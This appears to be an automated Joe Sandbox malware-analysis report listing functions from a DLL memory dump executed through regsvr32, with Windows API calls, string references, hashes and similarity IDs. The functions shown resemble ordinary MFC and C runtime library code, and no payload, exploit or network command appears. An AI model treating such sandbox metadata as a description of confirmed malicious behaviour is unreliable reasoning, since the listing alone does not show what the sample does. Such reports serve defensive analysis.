Opcode ID: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
Instruction ID: 0d6301bb9ab871ffe84231295dfe76788f8a31cd98ef4b571f500b89faff28c9
Opcode Fuzzy Hash: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
Instruction Fuzzy Hash: 1C11AF79801741AFE711CF79CD42B8ABBF0EF45311F214969E499EB2A0CB74AA40CB59

Uniqueness

Uniqueness Score: -1.00%

Function 10020C3F, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32), ref: 10020C68
GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 10020C85
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10020C92
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10020C9F
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 10020CAC

Strings

ReleaseActCtx, xrefs: 10020C87
DeactivateActCtx, xrefs: 10020CA1
ActivateActCtx, xrefs: 10020C94
CreateActCtxA, xrefs: 10020C7F
KERNEL32, xrefs: 10020C63

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
Instruction ID: 164c5ab3b4a161f1fd64f3c59e5fc8043f34cbc47aed943c162e41eaa6e30758
Opcode Fuzzy Hash: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
Instruction Fuzzy Hash: 621130F1C002A19BDB11DF99ADC484ABFE9F656240363427FF218D3221EB708854CE17

Uniqueness

Uniqueness Score: -1.00%

Function 10043A65, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10043A6C
std::_Lockit::_Lockit.LIBCPMT ref: 10043A76
int.LIBCPMT ref: 10043A8D

Part of subcall function 100427A3: std::_Lockit::_Lockit.LIBCPMT ref: 100427B6

std::locale::_Getfacet.LIBCPMT ref: 10043A96
ctype.LIBCPMT ref: 10043AB0
std::bad_exception::bad_exception.LIBCMT ref: 10043AC4
__CxxThrowException@8.LIBCMT ref: 10043AD2
std::locale::facet::_Incref.LIBCPMT ref: 10043AE2
std::locale::facet::facet_Register.LIBCPMT ref: 10043AE8

Strings

bad cast, xrefs: 10043ABC

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
String ID: bad cast
API String ID: 2535038987-3145022300
Opcode ID: 3269a5203a73611e901993287b551c215e6cb5b556df1f504442498d94acef6b
Instruction ID: 41e516e335ea381e6c6cf3992b6e31462ccd823a1db2d0b16548d00875c41f3f
Opcode Fuzzy Hash: 3269a5203a73611e901993287b551c215e6cb5b556df1f504442498d94acef6b
Instruction Fuzzy Hash: 7E01C039D401699BCB02DBA4DC42AEE7375FF84760F724129F110EB1D1DF74AA008799

Uniqueness

Uniqueness Score: -1.00%

Function 10043C84, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10043C8B
std::_Lockit::_Lockit.LIBCPMT ref: 10043C95
int.LIBCPMT ref: 10043CAC

Part of subcall function 100427A3: std::_Lockit::_Lockit.LIBCPMT ref: 100427B6

std::locale::_Getfacet.LIBCPMT ref: 10043CB5
codecvt.LIBCPMT ref: 10043CCF
std::bad_exception::bad_exception.LIBCMT ref: 10043CE3
__CxxThrowException@8.LIBCMT ref: 10043CF1
std::locale::facet::_Incref.LIBCPMT ref: 10043D01
std::locale::facet::facet_Register.LIBCPMT ref: 10043D07

Strings

bad cast, xrefs: 10043CDB

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
String ID: bad cast
API String ID: 577375395-3145022300
Opcode ID: 92449c159e0a17ff4070164fc4e6f4138defaf5b0dd7c915e336a137390c2ee1
Instruction ID: 1c641b6faa081a6f5f4558330d18bfb7172afe5efef557fc2d9691916cc6be6c
Opcode Fuzzy Hash: 92449c159e0a17ff4070164fc4e6f4138defaf5b0dd7c915e336a137390c2ee1
Instruction Fuzzy Hash: E701A979D002199BCB06DBA0DC42AAE7375FF84660FB14129F111FB1E1DF74AA008798

Uniqueness

Uniqueness Score: -1.00%

Function 1002341C, Relevance: 16.6, APIs: 11, Instructions: 139COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 10023423
FindResourceA.KERNEL32(?,?,00000005), ref: 10023456
LoadResource.KERNEL32(?,00000000), ref: 1002345E

Part of subcall function 100275EC: UnhookWindowsHookEx.USER32(?), ref: 1002761C

LockResource.KERNEL32(?,00000024,1000150C,00000000,ABFFDF4B), ref: 1002346F
GetDesktopWindow.USER32 ref: 100234A2
IsWindowEnabled.USER32(?), ref: 100234B0
EnableWindow.USER32(?,00000000), ref: 100234BF

Part of subcall function 1002A492: IsWindowEnabled.USER32(?), ref: 1002A49B

Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE

EnableWindow.USER32(?,00000001), ref: 100235A4
GetActiveWindow.USER32 ref: 100235AF
SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,ABFFDF4B), ref: 100235BD
FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,ABFFDF4B), ref: 100235D9

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
String ID:
API String ID: 964565984-0
Opcode ID: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
Instruction ID: c961092801c59ee9409441e3dbe49a4a333b051d42b2e552560430daa244bbc0
Opcode Fuzzy Hash: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
Instruction Fuzzy Hash: AA51A034A00B15DFDF11DFA4E9856AEBBF0FF48711F904029E54AA21A1CB719E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 10028C9F, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 10028CA6
GetPropA.USER32 ref: 10028CB5
CallWindowProcA.USER32 ref: 10028D0F

Part of subcall function 10027B1C: GetWindowRect.USER32 ref: 10027B46

SetWindowLongA.USER32 ref: 10028D36
RemovePropA.USER32 ref: 10028D3E
GlobalFindAtomA.KERNEL32 ref: 10028D45
GlobalDeleteAtom.KERNEL32 ref: 10028D4F
CallWindowProcA.USER32 ref: 10028DA3

Strings

AfxOldWndProc423, xrefs: 10028CAE, 10028CB3, 10028D3C, 10028D44

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
String ID: AfxOldWndProc423
API String ID: 2109165785-1060338832
Opcode ID: dccbfa165b239661d1f4eaae413e83b7f4de832619f3524192097b6a1288ccad
Instruction ID: ff35111d89a6fae3ee79e979b08ab4de06e021ef9fe06013c3cb9f10e1bb71d8
Opcode Fuzzy Hash: dccbfa165b239661d1f4eaae413e83b7f4de832619f3524192097b6a1288ccad
Instruction Fuzzy Hash: FB31843A80111ABBDF02DFA0EE49DBF7BB8FF46341F800519FA05A50A1C7759A14DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1002B9A0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 1002B9C8
GetStockObject.GDI32(0000000D), ref: 1002B9D0
GetObjectA.GDI32(00000000,0000003C,?), ref: 1002B9DD
GetDC.USER32(00000000), ref: 1002B9EC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002BA00
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 1002BA0C
ReleaseDC.USER32 ref: 1002BA18

Strings

System, xrefs: 1002B9C3, 1002BA2D

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
Instruction ID: 22c60c461008f25a8b5f8ebf610b65477afa905285395b5dac6d7a6a43a1c48b
Opcode Fuzzy Hash: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
Instruction Fuzzy Hash: F611C171A01228EBEB10DBA5DD89FAE7BB8FF05781F400015FA05E61C1DB709D01CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 1001E790, Relevance: 13.6, APIs: 9, Instructions: 105windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 1001E7D5
SendMessageA.USER32 ref: 1001E7FB
SendMessageA.USER32 ref: 1001E815
SendMessageA.USER32 ref: 1001E839
SendMessageA.USER32 ref: 1001E86E
SendMessageA.USER32 ref: 1001E888
SendMessageA.USER32 ref: 1001E8A4
SendMessageA.USER32 ref: 1001E8BD
SendMessageA.USER32 ref: 1001E8DB

Part of subcall function 1001E520: _strlen.LIBCMT ref: 1001E5FA
Part of subcall function 1001E520: _strlen.LIBCMT ref: 1001E614

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$_strlen
String ID:
API String ID: 3697954797-0
Opcode ID: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
Instruction ID: 0edfc11e8551d9ebf0957f65f3a3322fb23760369c1f09792b2f79df2d73aaf8
Opcode Fuzzy Hash: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
Instruction Fuzzy Hash: 22413A74F00306ABE704CF94CD85FAEB7B5FB88B41F208159FA19AB291C670A941DB54

Uniqueness

Uniqueness Score: -1.00%

Function 1002AF6B, Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 1002AF72
EnterCriticalSection.KERNEL32(?,00000010,1002B13B,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461), ref: 1002AF83
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002AFA1
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AFD5
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B041
_memset.LIBCMT ref: 1002B060
TlsSetValue.KERNEL32(?,00000000), ref: 1002B071
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B092

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: 26dcec1041afacb20883f8a88d8399bfa0257013ec7d92cf10d39ecfaabb8d94
Instruction ID: 31172aa3a9d6c7229b9057958b552749f74c39a7ca69aeefdb4b4ffe67e485c6
Opcode Fuzzy Hash: 26dcec1041afacb20883f8a88d8399bfa0257013ec7d92cf10d39ecfaabb8d94
Instruction Fuzzy Hash: 2431BCB4400A16EFDB25DF64ECC5C5ABBB4FF05310BA1C529E96A97661CB30AD90CF80

Uniqueness

Uniqueness Score: -1.00%

Function 10001920, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 10001982

Strings

ios_base::badbit set, xrefs: 100019A3
ios_base::failbit set, xrefs: 10001A1E
ios_base::eofbit set, xrefs: 10001A88

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
Instruction ID: 1c38ab3b2c14ee1c247bdf225933c46791fcea5bd7c47801f16d03e79e27f587
Opcode Fuzzy Hash: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
Instruction Fuzzy Hash: 29518A34904688EEDB14DFA0CC85BDDB7B1EF45300F6081ADE5056B285CBB46E85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 10021F51, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115threadwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 10021E9F: GetParent.USER32(00000000), ref: 10021EF3
Part of subcall function 10021E9F: GetLastActivePopup.USER32(00000000), ref: 10021F04
Part of subcall function 10021E9F: IsWindowEnabled.USER32(00000000), ref: 10021F18
Part of subcall function 10021E9F: EnableWindow.USER32(00000000,00000000), ref: 10021F2B

EnableWindow.USER32(?,00000001), ref: 10021F9E
GetWindowThreadProcessId.USER32(?,?), ref: 10021FB2
GetCurrentProcessId.KERNEL32 ref: 10021FBC
SendMessageA.USER32 ref: 10021FD4
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002204E
EnableWindow.USER32(00000000,00000001), ref: 10022093

Strings

0, xrefs: 10022029

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID: 0
API String ID: 1877664794-4108050209
Opcode ID: fa47c2bca283c1efa9c57a90baf6965e2cf2faf5ec170df8e895b8240d28c0a6
Instruction ID: c7e4dcc29fd9e1fd486e00497d35318e62f13d9d594050e36cf698265b5585c7
Opcode Fuzzy Hash: fa47c2bca283c1efa9c57a90baf6965e2cf2faf5ec170df8e895b8240d28c0a6
Instruction Fuzzy Hash: 7B41EF75A00228ABEB21CF64DC86BDA77B8FF14750F900599FA58D7281D7B09E80CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1002102D, Relevance: 12.1, APIs: 8, Instructions: 66memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 1002104C
lstrcmpA.KERNEL32(?,?), ref: 10021058
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1002106A
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1002108A
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10021092
GlobalLock.KERNEL32 ref: 1002109C
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 100210A9
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 100210C1

Part of subcall function 1002A801: GlobalFlags.KERNEL32(?), ref: 1002A810
Part of subcall function 1002A801: GlobalUnlock.KERNEL32(?,?,?,?,10021A27,?,00000214,1000148F), ref: 1002A822
Part of subcall function 1002A801: GlobalFree.KERNEL32 ref: 1002A82D

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
Instruction ID: 1e26f6493bbdf61cc617228eadb58d3a13350607a0778397bdab265459f41c03
Opcode Fuzzy Hash: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
Instruction Fuzzy Hash: 6E11E079600640BBDB228BA5CD89DAFBAFDFB867407500529F605D2020DA72ED81DB64

Uniqueness

Uniqueness Score: -1.00%

Function 1002A98E, Relevance: 12.0, APIs: 8, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 1002A99D
GetSystemMetrics.USER32 ref: 1002A9A4
GetSystemMetrics.USER32 ref: 1002A9AB
GetSystemMetrics.USER32 ref: 1002A9B5
GetDC.USER32(00000000), ref: 1002A9BF
GetDeviceCaps.GDI32(00000000,00000058), ref: 1002A9D0
GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002A9D8
ReleaseDC.USER32 ref: 1002A9E0

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: 97df97701bdba165d7bd0f3935d33a7940ab39bf43f5bcde9822dd001b09b376
Instruction ID: 4b18a5fc2a191a652713761d43d2b2da4b0cc28fbe92607e78cb1662e9ca01b2
Opcode Fuzzy Hash: 97df97701bdba165d7bd0f3935d33a7940ab39bf43f5bcde9822dd001b09b376
Instruction Fuzzy Hash: 0CF0F9B1E40724BAF7105F728C89B167EA8FB49761F004456E6199B281DAB599118FD0

Uniqueness

Uniqueness Score: -1.00%

Function 10001D60, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 136windowCOMMON

Download Yara Rule

APIs

Part of subcall function 10022D72: _memset.LIBCMT ref: 10022D8E

_strlen.LIBCMT ref: 10001E7F
_strlen.LIBCMT ref: 10001EF1
_strlen.LIBCMT ref: 10001F36
LoadIconA.USER32 ref: 10001F81

Strings

127.0.0.1, xrefs: 10001E68, 10001E7A, 10001E8E
^t, xrefs: 10001F81

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: _strlen$IconLoad_memset
String ID: ^t$127.0.0.1
API String ID: 858515944-3506571716
Opcode ID: b8f0a33aed5857d50bc6d4f51472f84c63fc56d9dccdc7a641a98e34b1a5589f
Instruction ID: cb70d14c711791ee52ee588ee2f9325bb7e7fa3515ba92e26f588566a221a80e
Opcode Fuzzy Hash: b8f0a33aed5857d50bc6d4f51472f84c63fc56d9dccdc7a641a98e34b1a5589f
Instruction Fuzzy Hash: AE5118B4904298DBDB14CFA4CC41B9EBBB1EF45308F6481A8E50DAB392DB356E85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 1002B84C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128stringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 1002B878
lstrlenA.KERNEL32(?), ref: 1002B8C3
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 1002B8DD
_wcslen.LIBCMT ref: 1002B901

Strings

System, xrefs: 1002B874

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharGlobalLockMultiWide_wcslenlstrlen
String ID: System
API String ID: 4253822919-3470857405
Opcode ID: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
Instruction ID: 7b5a175680f670ca79b6c2ec9272e95e82f354ff2106dbd97111df154043a3f4
Opcode Fuzzy Hash: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
Instruction Fuzzy Hash: C8412671D00619DFDB14CFA4DC85AAEBBB9FF04310F64812AE516EB285E770AD85CB50

Uniqueness

